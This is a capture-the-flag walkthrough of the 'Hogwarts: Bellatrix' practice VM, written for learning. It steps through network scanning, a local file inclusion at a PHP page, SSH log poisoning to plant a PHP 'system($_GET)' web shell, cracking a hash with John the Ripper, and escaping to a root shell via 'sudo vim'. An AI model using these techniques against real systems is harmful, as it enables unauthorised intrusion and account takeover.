HOGWARTS: BELLATRIX (walkthrough)
This task is bit different from other,the machine given is a .ova file which is a VMware extension.We will setup the machine using these steps:
- Import the ‘ova file’ in “Vmware workstation Pro” [Note: Pro version helps in setup the network settings easily using virtual network editor]
- change the network settings after launching the machine,
>click on edit
> virtual network editor
> change settings(right bottom;will give permissions for changing network settings)
> change VMnet0 to bridge type and external connection to host-only ethernet(i am using virtualbox to perform this challenge so,i add virtualbox host-only)
> click apply and ok
3 Now, setup virtualbox machine network from where we perform all challenge
>click on settings of machine
>go to network section
>check the adapter 1 and adapter 2 box(one for vmware machine access and other for internet connectivity)
>Adapter 1 settings are : attached to → host-only adapter; Name → virtualbox host-only ethernet
>Adapter 2 settings are : attached to → Bridged adapter; Name → intel wifi 6 (in my case, your main internet name may be different)
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Let’s begin the challenge from here
Phase 1 (on virtualbox machine)
ifconfig : this shows the machine ip (192.168.56.108 my case eth0)
Firstly,perform netdiscovery scan to get the target (vmware machine) ip address using sudo netdiscover -P -i eth0 -r 192.168.56.0/24
check for open ports using network scanner NMAP using command
sudo nmap -A -sS -sV 192.168.56.106
Open ports are 22 ssh | 80 http
Phase 2
Open browser and search for the ip address (my case 192.168.56.106)
Reconnaissance the whole website , check for source code and use inspect element
Information gathered:
“ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack.php” → last line of the webiste
/*$file = $_GET[‘file’];
if(isset($file)){
include(“$file”);*/
→this is commented in the source code
This shows we have a directory ikilledsiriusblack.php and there is a script which can take input as a file
Searching and reading some other write up’s understand the hints it indicated a LOCAL FILE INCLUSION vulnerability possibly
192.168.56.106/ikilledsiriusblack.php?file=/etc/passwd
this url can be described as
/ikilledsiriusblack.php → directory
?file=/etc/passwd → LFI vuln can be confirmed like this
Looking each line carefully, got two things
bellatrix:x:1000:1000:Bellatrix,,,:/home/bellatrix:/bin/bash
lestrange:x:1001:1001::/home/lestrange:/bin/rbash
bellatrix user has /bin/bash means everything is allowed & lestrange user has /bin/rbash means it has restricted shell , can’t perform all terminal commands…
After learning more about LOCAL FILE INCLUSION vulnerability , i got to know we can perform log poisoning using two methods:
RCE (apache access) & SSH log
command ?file=/var/log/apache2/access.log , RCE is not possible as it is not allowed
command ?file=/var/log/auth.log , SSH poisoning is successful
Now that we know ssh is possible through is vulnerability and everything is dumped into log file which is accessible , lets try to perform it…
ssh Bellatrix@192.168.56.106 (we dont know password,and it is not needed)
Doing so we notice a new entry in log file,Remember a commented script in the page source… , we have to add a php script to execute whatever we pass to it as a username in ssh.
this php script is ‘<?php system($_GET[‘m’])?>’ (‘ ’ included) i can describe it in detail as
a php code for executing any file we pass in variable ‘m’
> system() is a PHP function that allows the execution of shell commands.
> $_GET[‘m’] code retrieves the value of the query parameter “m” from the URL’s
further, exploit this vulnerability we can reverse shell to our machine terminal for full access
Enumerating each directory manually and find some useful information
lestrange:$6$1eIjsdebFF9/rsXH$NajEfDYUP7p/sqHdyOIFwNnltiRPwIU0L14a8zyQIdRUlAomDNrnRjTPN5Y/WirDnwMn698kIA5CV8NLdyGiY0
a hash stored in Swordofgryffindor directory & also .secret.dic file containing wordlist
so at this point i have a hash and a wordlist with users name lets find the value of hash using a tool JOHNTHERIPPER
password:ihateharrypotter
ssh to another user lestrange and password ihateharrypotter. But it is restricted shell (we already know from /bin/rbash).
command sudo -l (to know what users have permissions)
ALL : ALL) NOPASSWD: /usr/bin/vim (means we can use vim commands to execute our commands)
Bypass it using vim /bin/bash
sudo vim -c ‘:!/bin/sh’ (: means command mode of vim , ! means execute external shell command)
gained full shell access , enumerate to bellatrix directory and got flag for user
user: {69e0f71f25ece4351e4d73af430bec43}
But need to get root , so moving further …………
Enumerate to root directory , can show a root.txt file which contains
root{ead5a85a11ba466011fced308d460a76}
AND THATS THE END OF CHALLENGE
THANKYOU for reading till here!
Find me here:https://www.linkedin.com/in/mandeepkumarbanihall/